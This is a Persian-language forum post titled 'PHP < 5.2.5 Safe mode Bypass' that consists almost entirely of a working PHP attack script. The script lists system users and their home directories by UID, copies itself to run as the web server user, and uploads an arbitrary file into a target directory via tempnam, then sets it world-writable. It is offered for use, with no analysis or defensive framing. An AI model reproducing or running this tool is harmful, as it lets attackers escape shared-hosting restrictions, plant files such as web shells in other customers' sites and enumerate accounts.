SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

PHP < 5.2.5 Safe mode Bypass

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • PHP < 5.2.5 Safe mode Bypass

    [align=LEFT][php]

    <html dir="ltr">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title>SAFE MODE BYPASS</title>
    <style type="text/css" media="screen">
    body {
    font-size: 10px;
    font-family: verdana;
    }
    INPUT {
    BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #D50428; BACKGROUND: #590009; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #D50428; COLOR: #00ff00; BORDER-TOP-COLOR: #D50428; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #D50428
    }
    </style>
    </head>
    <body dir="ltr" alink="#00ff00" bgcolor="#000000" link="#00c000" text="#008000" vlink="#00c000">
    <form method="POST" enctype="multipart/form-data" action="?">
    Enter The <A href='?info=1' > Target Path </A>:<BR><BR>
    <input type="text" name="target" value="<?php echo $_SERVER['DOCUMENT_ROOT']; ?>" size="50"><BR>*Target must be writeable!<BR><BR>
    File Content:<BR><BR>
    <input type="file" name="F1" size="50"><BR><BR>
    <input type="submit" name="Upload" value="Upload">
    </form>
    <?php
    error_reporting(E_ALL ^ E_NOTICE);

    if(isset($_GET['info']) && $_GET['info'] == 1)
    {
    if (function_exists('posix_getpwuid'))
    {
    if (isset($_POST['f']) && isset($_POST['l']))
    {
    $f = intval($_POST['f']);
    $l = intval($_POST['l']);
    while ($f < $l)
    {
    $uid = posix_getpwuid($f);
    if ($uid)
    {
    $uid["dir"] = "<a href=\"\">".$uid["dir"]."</a>";
    echo join(":",$uid)."<br>";
    }
    $f++;
    }
    } else
    {
    echo '
    <form method="POST" action="?info=1">Uid
    FROM : <input type="text" name="f" value="1" size="4">
    TO : <input type="text" name="l" value="1000" size="4">
    <input type="submit" name="Show" value="Show">';
    }
    } else die("Sorry! Posix Functions are disabled in your box, There is no way to obtain users path! You must enter it manually!");
    die();
    }

    if(isset($_POST['Upload']) && isset($_POST['target']) && $_POST['target'] != "")
    {
    $MyUid = getmyuid();
    $MyUname = get_current_user();
    if (function_exists('posix_geteuid'))
    {
    $HttpdUid = posix_geteuid();
    $HttpdInfo = posix_getpwuid($HttpdUid);
    $HttpdUname = "(".$HttpdInfo['name'].")";
    } else
    {
    $NewScript = @fopen('bypass.php','w+');
    if (!$NewScript)
    {
    die('Make the Current directory Writeable (Chmod 777) and try again');
    } else $HttpdUid = fileowner('bypass.php');
    }

    if ($MyUid != $HttpdUid)
    {
    echo "This Script User ($MyUid) and httpd Process User ($HttpdUid) dont match!";
    echo " We Will create a copy of this Script with httpd User $HttpdUname
    in current directory..."."<BR>";
    if (!$NewScript)
    {
    $NewScript = @fopen('bypass.php','w+');
    if (!$NewScript)
    {
    die('Make the Current directory Writeable (Chmod 777) and try again');
    }
    }
    $Temp = fopen(__FILE__ ,'r');
    while (!feof($Temp))
    {
    $Buffer = fgets($Temp);
    fwrite($NewScript,$Buffer);
    }
    fclose($Temp);
    fclose($NewScript);
    echo "Please Run <A href='bypass.php'> This </A> Script";
    die();
    }

    $TargetPath = trim($_POST['target']);
    $TargetFile = tempnam($TargetPath,"BP");
    if (strstr($TargetFile, $TargetPath) == TRUE)
    {
    echo $TargetFile." Successfully created!<BR>";
    } else die("$TargetPath doesnt exist or is not writeable! choose another path!");

    if (move_uploaded_file($_FILES['F1']['tmp_name'], $TargetFile))
    {
    echo "<BR>$TargetFile is valid, and was successfully uploaded.";
    } else
    {
    die("<BR>$TargetFile Could not upload.");
    }
    chmod($TargetFile , 0777);
    }

    ?>


    [/php][/align]
    [align=center][/align]
صبر کنید ..
X